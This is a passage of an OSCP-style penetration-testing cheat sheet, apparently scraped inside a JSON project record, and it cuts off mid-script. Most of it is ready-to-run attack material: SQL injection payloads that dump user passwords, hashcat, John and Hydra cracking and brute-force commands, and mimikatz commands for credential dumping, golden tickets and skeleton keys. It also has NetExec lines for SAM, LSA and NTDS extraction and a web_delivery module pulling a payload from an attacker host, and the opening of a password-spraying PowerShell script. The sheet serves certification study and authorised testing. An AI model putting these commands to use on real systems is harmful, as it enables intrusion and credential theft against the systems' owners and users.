1=1--\n```\n\n###### Get Number of Columns\n\n```c\n' order by 3--\n```\n\n###### Get Table Name\n\n```c\n' union select null,table_name,null from all_tables--\n```\n\n###### Get Column Name\n\n```c\n' union select null,column_name,null from all_tab_columns where table_name='\u003cTABLE\u003e'--\n```\n\n###### Dump Data\n\n```c\n' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--\n```\n\n##### SQLite\n\n###### Extracting Table Names\n\n```c\nhttp://\u003cRHOST\u003e/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--\n```\n\n###### Extracting User Table\n\n```c\nhttp://\u003cRHOST\u003e/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--\n```\n\n##### Error-based SQL Injection (SQLi)\n\n```c\n\u003cUSERNAME\u003e' OR 1=1 -- //\n```\n\nResults in:\n\n```c\nSELECT * FROM users WHERE user_name= '\u003cUSERNAME\u003e' OR 1=1 --\n```\n\n```c\n' or 1=1 in (select @@version) -- //\n' OR 1=1 in (SELECT * FROM users) -- //\n' or 1=1 in (SELECT password FROM users) -- //\n' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //\n```\n\n##### UNION-based SQL Injection (SQLi)\n\n###### Manual Injection Steps\n\n```c\n$query = \"SELECT * FROM customers WHERE name LIKE '\".$_POST[\"search_input\"].\"%'\";\n```\n\n```c\n' ORDER BY 1-- //\n```\n\n```c\n%' UNION SELECT database(), user(), @@version, null, null -- //\n```\n\n```c\n' UNION SELECT null, null, database(), user(), @@version  -- //\n```\n\n```c\n' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //\n```\n\n```c\n' UNION SELECT null, username, password, description, null FROM users -- //\n```\n\n##### Blind SQL Injection (SQLi)\n\n```c\nhttp://\u003cRHOST\u003e/index.php?user=\u003cUSERNAME\u003e' AND 1=1 -- //\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?user=\u003cUSERNAME\u003e' AND IF (1=1, 
sleep(3),'false') -- //\n```\n\n#### SQL Truncation Attack\n\n```c\n'admin@\u003cFQDN\u003e' = 'admin@\u003cFQDN\u003e++++++++++++++++++++++++++++++++++++++htb'\n```\n\n#### sqlite3\n\n```c\nsqlite3 \u003cFILE\u003e.db\n```\n\n```c\nsqlite\u003e .tables\nsqlite\u003e PRAGMA table_info(\u003cTABLE\u003e);\nsqlite\u003e SELECT * FROM \u003cTABLE\u003e;\n```\n\n#### sqsh\n\n```c\nsqsh -S \u003cRHOST\u003e -U \u003cUSERNAME\u003e\nsqsh -S '\u003cRHOST\u003e' -U '\u003cUSERNAME\u003e' -P '\u003cPASSWORD\u003e'\nsqsh -S '\u003cRHOST\u003e' -U '.\\\u003cUSERNAME\u003e' -P '\u003cPASSWORD\u003e'\n```\n\n##### List Files and Folders with xp_dirtree\n\n```c\nEXEC master.sys.xp_dirtree N'C:\\inetpub\\wwwroot\\',1,1;\n```\n\n### Password Attacks\n\n#### DonPAPI\n\n```c\nDonPAPI \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e\nDonPAPI -local_auth \u003cUSERNAME\u003e@\u003cRHOST\u003e\nDonPAPI --hashes \u003cLM\u003e:\u003cNT\u003e \u003cDOMAIN\u003e/\u003cUSERNAME\u003e@\u003cRHOST\u003e\nDonPAPI -laps \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e\n```\n\n#### fcrack\n\n```c\nfcrackzip -u -D -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e \u003cFILE\u003e.zip\n```\n\n#### Group Policy Preferences (GPP)\n\n##### gpp-decrypt\n\n```c\npython3 gpp-decrypt.py -f Groups.xml\npython3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\n```\n\n#### hashcat\n\n\u003e https://hashcat.net/hashcat/\n\n\u003e https://hashcat.net/wiki/doku.php?id=hashcat\n\n\u003e https://hashcat.net/cap2hashcat/\n\n\u003e https://hashcat.net/wiki/doku.php?id=example_hashes\n\n```c\nhashcat -m 0 md5 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 100 sha-1 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1400 sha256 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 3200 bcrypt /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 900 md4 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1000 ntlm 
/PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 1800 sha512 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -m 160 hmac-sha1 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nhashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force\nhashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u  --force hash.txt ?3?3?1?1?1?1?2?3\n```\n\n```c\nhashcat --example-hashes\nhashcat --help | grep -i \"ntlm\"\n```\n\n```c\nhashcat --identify --user \u003cFILE\u003e\n```\n\n```c\n/usr/share/wordlists/fasttrack.txt\n/usr/share/hashcat/rules/best64.rule\n```\n\n##### Custom Rules\n\n\u003e https://hashcat.net/wiki/doku.php?id=rule_based_attack\n\n###### Add a 1 to each Password\n\n```c\necho \\$1 \u003e \u003cFILE\u003e.rule\n```\n\n###### Capitalize first character\n\n```c\n$1\nc\n```\n\n###### Add nothing, a 1 or a ! to an existing Wordlist\n\n```c\n:\n$1\n$!\n```\n\n###### Rule for upper case Letter, numerical Value and special Character\n\n- $1 \u003e appends a \"1\"\n- $2 \u003e appends a \"2\"\n- $3 \u003e appends a \"3\"\n- c \u003e Capitalize the first character and lower case the rest\n\n```c\n$1 c $!\n$2 c $!\n$1 $2 $3 c $!\n```\n\n###### Rule Preview\n\n```c\nhashcat -r \u003cFILE\u003e.rule --stdout \u003cFILE\u003e.txt\n```\n\n##### Cracking ASREPRoast Password File\n\n```c\nhashcat -m 18200 -a 0 \u003cFILE\u003e \u003cFILE\u003e\n```\n\n##### Cracking Kerberoasting Password File\n\n```c\nhashcat -m 13100 --force \u003cFILE\u003e \u003cFILE\u003e\n```\n\n##### Bruteforce based on the Pattern\n\n```c\nhashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout\n```\n\n##### Generate Password Candidates: Wordlist + Pattern\n\n```c\nhashcat -a6 -m0 \"e99a18c428cb38d5f260853678922e03\" yourPassword|/PATH/TO/WORDLIST/\u003cWORDLIST\u003e ?d?d?d?u?u?u --force --potfile-disable --stdout\n```\n\n##### Generate NetNTLMv2 with internalMonologue and crack with hashcat\n\n```c\nInternalMonologue.exe -Downgrade False -Restore False -Impersonate True 
-Verbose False -challange 002233445566778888800\n```\n\n###### Result\n\n```c\nspotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000\n```\n\n##### Crack with hashcat\n\n```c\nhashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --force --potfile-disable\n```\n\n##### Rules\n\n\u003e https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule\n\n##### Cracking with OneRuleToRuleThemAll.rule\n\n```c\nhashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule\n```\n\n#### Hydra\n\n```c\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -p \u003cPASSWORD\u003e \u003cPROTOCOL\u003e\nhydra \u003cRHOST\u003e -L /PATH/TO/WORDLIST/\u003cFILE\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e \u003cPROTOCOL\u003e\nhydra \u003cRHOST\u003e -C /PATH/TO/WORDLIST/\u003cFILE\u003e ftp\n```\n\n```c\nexport HYDRA_PROXY=connect://127.0.0.1:8080\nunset HYDRA_PROXY\n```\n\n```c\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/admin.php:username=^USER^\u0026password=^PASS^:login_error\"\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/index.php:username=user\u0026password=^PASS^:Login failed. 
Invalid\"\nhydra \u003cRHOST\u003e -L /PATH/TO/WORDLIST/\u003cFILE\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/login:usernameField=^USER^\u0026passwordField=^PASS^:unsuccessfulMessage\" -s \u003cRPORT\u003e\nhydra \u003cRHOST\u003e -l root@localhost -P otrs-cewl.txt http-form-post \"/otrs/index.pl:Action=Login\u0026RequestedURL=Action=Admin\u0026User=root@localhost\u0026Password=^PASS^:Login failed\" -vV -f\nhydra \u003cRHOST\u003e -l admin -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1\u0026__EVENTVALIDATION=COOKIE_2\u0026UserName=^USER^\u0026Password=^PASS^\u0026LoginButton=Log+in:Login failed\"\n```\n\n#### John\n\n```c\nkeepass2john \u003cFILE\u003e\nssh2john id_rsa \u003e \u003cFILE\u003e\nzip2john \u003cFILE\u003e \u003e \u003cFILE\u003e\njohn \u003cFILE\u003e --wordlist=/PATH/TO/WORDLIST/\u003cWORDLIST\u003e --format=crypt\njohn \u003cFILE\u003e --rules --wordlist=/PATH/TO/WORDLIST/\u003cWORDLIST\u003e\njohn --show \u003cFILE\u003e\n```\n\n#### Kerbrute\n\n##### User Enumeration\n\n```c\n./kerbrute userenum -d \u003cDOMAIN\u003e --dc \u003cDOMAIN\u003e /PATH/TO/FILE/\u003cUSERNAMES\u003e\n```\n\n##### Password Spray\n\n```c\n./kerbrute passwordspray -d \u003cDOMAIN\u003e --dc \u003cDOMAIN\u003e /PATH/TO/FILE/\u003cUSERNAMES\u003e \u003cPASSWORD\u003e\n```\n\n#### LaZagne\n\n```c\nlaZagne.exe all\n```\n\n#### mimikatz\n\n##### Common Commands\n\n```c\ntoken::elevate\ntoken::revert\nvault::cred\nvault::list\nlsadump::sam\nlsadump::secrets\nlsadump::cache\nlsadump::dcsync /\u003cUSERNAME\u003e:\u003cDOMAIN\u003e\\krbtgt /domain:\u003cDOMAIN\u003e\n```\n\n##### Dump Hashes\n\n```c\n.\\mimikatz.exe\nsekurlsa::minidump /users/admin/Desktop/lsass.DMP\nsekurlsa::LogonPasswords\nmeterpreter \u003e getprivs\nmeterpreter \u003e creds_all\nmeterpreter \u003e golden_ticket_create\n```\n\n##### Pass the Ticket\n\n```c\n.\\mimikatz.exe\nsekurlsa::tickets /export\nkerberos::ptt 
[0;76126]-2-0-40e10000-Administrator@krbtgt-\u003cRHOST\u003e.LOCAL.kirbi\nklist\ndir \\\\\u003cRHOST\u003e\\admin$\n```\n\n##### Forging Golden Ticket\n\n```c\n.\\mimikatz.exe\nprivilege::debug\nlsadump::lsa /inject /name:krbtgt\nkerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500\nmisc::cmd\nklist\ndir \\\\\u003cRHOST\u003e\\admin$\n```\n\n##### Skeleton Key\n\n```c\nprivilege::debug\nmisc::skeleton\nnet use C:\\\\\u003cRHOST\u003e\\admin$ /user:Administrator mimikatz\ndir \\\\\u003cRHOST\u003e\\c$ /user:\u003cUSERNAME\u003e mimikatz\n```\n\n#### NetExec\n\n```c\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o READ_ONLY=false\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999\nnetexec smb \u003cRHOST\u003e -u '' -p '' --share \u003cSHARE\u003e --get-file \u003cFILE\u003e \u003cFILE\u003e \nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute 100000\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' \nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --users\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares \u003cSHARE\u003e --dir\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares \u003cSHARE\u003e --dir \"FOLDER\"\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p 
'\u003cPASSWORD\u003e' --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --lsa\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --dpapi\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --lsa\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --dpapi\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M enum_av\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M wcc\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M snipped\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M lsassy\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M web_delivery -o URL=http://\u003cLHOST\u003e/\u003cFILE\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M gpp_autologin\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M gpp_password\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M powershell_history\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M coerce_plus -o LISTENER=\u003cLHOST\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --ntds\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cNTLMHASH\u003e' --ntds\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --ntds --user \u003cUSERNAME\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cNTLMHASH\u003e' --ntds --user \u003cUSERNAME\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cHASH\u003e' -x \"whoami\"\nnetexec smb 
/PATH/TO/FILE/\u003cFILE\u003e --gen-relay-list \u003cFILE\u003e\nnetexec ldap \u003cRHOST\u003e -u '' -p '' --asreproast\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M -user-desc\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M get-desc-users\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M ldap-checker\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M veeam\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M maq\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M adcs\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M zerologon\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M petitpotam\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M nopac\nnetexec ldap \u003cRHOST\u003e -u '' -p '' --use-kcache -M whoami\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa -k\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa-convert-id \u003cID\u003e\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa-decrypt-lsa \u003cACCOUNT\u003e\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M get-network -o ALL=true\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --bloodhound -ns \u003cRHOST\u003e -c all\nnetexec winrm \u003cSUBNET\u003e/24 -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -d .\nnetexec winrm -u /t -p '\u003cPASSWORD\u003e' -d '\u003cDOMAIN\u003e' \u003cRHOST\u003e\nnetexec winrm \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nnetexec winrm \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --ignore-pw-decoding\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --no-bruteforce --continue-on-success\nnetexec \u003cPROTOCOL\u003e 
\u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --shares\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --shares --continue\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --pass-pol\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --lusers\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --sam\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --wdigest enable\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e -x 'quser'\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e -x 'net user Administrator /domain' --exec-method smbexec\n```\n\n#### pypykatz\n\n```c\npypykatz lsa minidump lsass.dmp\npypykatz registry --sam sam system\n```\n\n#### Spray-Passwords\n\n##### Spray-Passwords.ps1\n\n```powershell\n\u003c#\n  .SYNOPSIS\n    PoC PowerShell script to demo how to perform password spraying attacks against \n     user accounts in Active Directory (AD), aka low and slow online brute force method.\n    Only use for good and after written approval from AD owner.\n    Requires access to a Windows host on the internal network, which may perform\n     queries against the Primary Domain Controller (PDC).\n    Does not require admin access, neither in AD or on Windows host.\n    Remote Server Administration Tools (RSAT) are not required.\n    \n    Should NOT be considered OPSEC safe since:\n    - a lot of traffic is generated between the host and the Domain Controller(s).\n    - 
failed logon events will be massive on Domain Controller(s).\n    - badpwdcount will iterate on user account objects in scope.\n    \n    No accounts should be locked out by this script alone, but there are no guarantees.\n    NB! This script does not take Fine-Grained Password Policies (FGPP) into consideration.\n  .DESCRIPTION\n    Perform password spraying attack against user accounts in Active Directory.\n  .PARAMETER Pass\n    Specify a single or multiple passwords to test for each targeted user account. Eg. -Pass 'Password1,Password2'. Do not use together with File or Url.\"\n\t\n  .PARAMETER File\n    Supply a path to a password input file to test multiple passwords for each targeted user account. Do not use together with Pass or Url.\n\t\n  .PARAMETER Url\n    Download file from given URL and use as password input file to test multiple passwords for each targeted user account. Do not use together with File o","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xsyr0%2FOSCP","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xsyr0%2FOSCP","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xsyr0%2FOSCP/lists"}